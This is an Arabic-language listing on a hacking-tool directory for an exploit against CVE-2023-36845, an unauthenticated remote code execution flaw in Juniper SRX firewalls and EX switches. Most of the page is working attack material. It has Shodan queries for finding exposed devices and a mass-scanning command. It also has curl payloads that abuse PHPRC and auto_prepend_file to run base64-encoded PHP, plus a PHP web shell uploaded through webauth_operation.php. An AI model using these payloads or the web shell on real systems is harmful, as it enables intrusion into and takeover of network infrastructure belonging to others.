Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Juniper-exploit-CVE-2023-36845 — استغلال لـ CVE-2023-36845، ثغرة معالجة متغيرات بيئة PHP في Juniper SRX/EX، يتيح تنفيذ تعليمات برمجية عن بُعد غير مصادق عليه عبر طلبات HTTP مصممة. | Kitploit
أدوات/GitHubGitHub/charondefalt/juniper-exploit-cve-2023-36845
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةتطوير الحمولات
GitHubcharondefalt/juniper-exploit-cve-2023-36845

Juniper-exploit-CVE-2023-36845

استغلال لـ CVE-2023-36845، ثغرة معالجة متغيرات بيئة PHP في Juniper SRX/EX، يتيح تنفيذ تعليمات برمجية عن بُعد غير مصادق عليه عبر طلبات HTTP مصممة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
3منذ 2 سنواتلم تتم المراجعة بعد

CVE-2023-36845

الوصف

تمثل CVE-2023-36845 ثغرة بارزة في معالجة متغيرات بيئة PHP تؤثر على جدران الحماية Juniper SRX ومفاتيح EX. على الرغم من أن Juniper صنفت هذه الثغرة على أنها متوسطة الخطورة، إلا أننا في هذه المقالة سنوضح كيف يمكن استغلال هذه الثغرة الواحدة لتنفيذ أوامر عن بعد دون مصادقة.

البحث - Shodan

root@kitploit:~
title:"Juniper Web Device Manager"
image
root@kitploit:~
title:"Juniper" http.favicon.hash:2141724739
image

الاستخدام 🛠

الكشف

root@kitploit:~
python3 CVE-2023-36845.py -f targets.txt -o output.txt

RCE 🧨

الخيار 1

من الممكن استخدام أي غلاف بروتوكول (protocol wrapper) مع auto_prepend_file. الخيار الأنسب لهذه العملية هو بروتوكول data://، والذي يسمح بتقديم "الملف الثانوي" مباشرة في السطر. إليك تمثيل متطور لهذا الاستغلال، ينفذ الكود المضمن <? phpinfo(); ?> داخل مخطط data://:

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'

تنفيذ أمر whoami

<?php shell_exec('whoami'); ?>

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'

الخيار 2

رفع ملف

<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>

root@kitploit:~
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'

المعلمات 🧰

المعلمةالوصفالنوع
--file / -fملف الأهداف المدخلةملف
-oملف الإخراجملف
تنزيل الأداة